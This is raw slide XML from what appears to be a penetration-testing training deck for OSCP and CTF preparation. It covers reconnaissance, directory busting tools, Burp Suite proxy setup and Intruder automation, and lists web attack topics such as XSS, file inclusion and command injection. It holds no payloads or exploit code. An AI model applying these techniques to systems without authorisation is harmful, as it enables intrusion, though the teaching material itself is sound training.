            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attention to detail helps, but embrace the failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can’t know everything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For OSCP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find what you’re good at, build confidence with those and branch from there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take notes and prioritize opportunities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29724776-E3CE-4F54-82FD-41E4B56CFC12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7873999" y="1768455"/>
            <a:ext cx="4236721" cy="4236721"/>
            <a:chOff x="7873999" y="1768455"/>
            <a:chExt cx="4236721" cy="4236721"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="A picture containing diagram&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67453A41-0226-454A-9D34-CD11315F463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873999" y="1768455"/>
              <a:ext cx="4236721" cy="4236721"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01605BB8-3408-4E97-8543-BCFC45E9752D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8122011" y="1768455"/>
              <a:ext cx="3287959"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488DC9">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:pattFill prst="solidDmnd">
                    <a:fgClr>
                      <a:srgbClr val="FEFB00"/>
                    </a:fgClr>
                    <a:bgClr>
                      <a:srgbClr val="8FD8F8">
                        <a:lumMod val="75000"/>
                      </a:srgbClr>
                    </a:bgClr>
                  </a:pattFill>
                  <a:effectLst>
                    <a:innerShdw blurRad="177800">
                      <a:srgbClr val="488DC9">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:innerShdw>
                  </a:effectLst>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>My Brain is Fried</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291627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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4278225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B8001-CD78-6846-91F1-30431D512F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 2:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE59E52-33D2-AD2B-38FD-A6C777A1C04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8943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1A5E8-8BE9-4881-BF37-B7ED4BF8EE95}"/>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1D181EA2-37FB-4BD7-92FE-84E20130845C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick Recon Recap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With a dash of directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL, other</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12509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Recon Recap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354580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C3B07-4AAE-4F5D-A6DF-BB28272A3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B01AACF-BB42-45F9-A64A-8363F32182F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9566EF23-1DB0-4217-B255-2CC2465AC975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory busting is likely necessary for OSCP/CTFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer tools are your friend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examine page source, loaded resources, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs can give good info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might identify file inclusion vulnerabilities, command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do your research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find admin portals, default passwords, upload functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3232851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Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3976816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51BB9-37B6-4BBE-93C6-5813753938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3EFBD19-50E2-4D84-B656-28E018604DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD572DA-09ED-44E3-812E-FA680B9A6B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="8517788" cy="5174326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always have this running if up against a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy, automating attacks, vulnerability scanning (paid)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install Burp and launch it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Either manually (browser settings) or with an add-on, set up proxy in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FoxyProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is good for Kali, easy to turn on and off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy settings: 127.0.0.1, port 8080 by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add the Burp certificate authority to your browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Logo, company name&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF637DC-B4E3-4124-97A6-1EEAC7DE0564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9146734" y="1912350"/>
            <a:ext cx="2491115" cy="3033299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3812464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812D6-C0B6-4954-A224-3910F525D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45C4267-5C19-4CEA-B36B-C8BC91C7339D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy and Scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E5D2C1-B4EA-4A08-A3E0-D02A8898C987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="5847313" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can set to intercept or passive mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intercept: All requests get stopped until explicitly approved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passive: Keeps a record of requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With Intercept, can edit requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good for avoiding basic web filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scope limits requests that get trapped or logged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very useful as browsers often get/send periodic telemetry requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B7C50E-150A-44FB-990D-5CF50EBD00DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="34701"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457066" y="828262"/>
            <a:ext cx="5321352" cy="1944757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0AF72B-2305-4FBA-80E8-83F65A193BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6437245" y="2935349"/>
            <a:ext cx="5341174" cy="1328115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB1FD405-9AF9-4781-B297-A32201AE52BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6783407" y="4443652"/>
            <a:ext cx="4648849" cy="1838582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25864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C3B07-4AAE-4F5D-A6DF-BB28272A3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B01AACF-BB42-45F9-A64A-8363F32182F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9566EF23-1DB0-4217-B255-2CC2465AC975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon activities that do not touch the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: Social media, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, news, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brent’s Exception: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> use of a company’s website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Reading vendor-supplied software documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t get too wrapped up in definitions (unless going for a cert)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applicable to real life, but only subsets apply to OSCP/CTFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focus today on general research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2056391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0BF5C-8E0A-4631-B218-B796A1103B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182A790-0D47-4477-9159-86BA9C0C5ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example Request Pane</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1C48A7D-05D3-4049-BF27-FA8401DAB877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1356651" y="1783062"/>
            <a:ext cx="9478698" cy="4182059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650071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38677-3E23-45B2-BCBB-5CEDE94F78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5ED40D-013C-441B-8837-42C0C471B8C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intruder (1/2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD35B3A8-DA76-4111-A38D-8977AB5C7512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5681662" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intruder allows attack automation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on prior requests from HTTP history, right click &gt; send to Intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
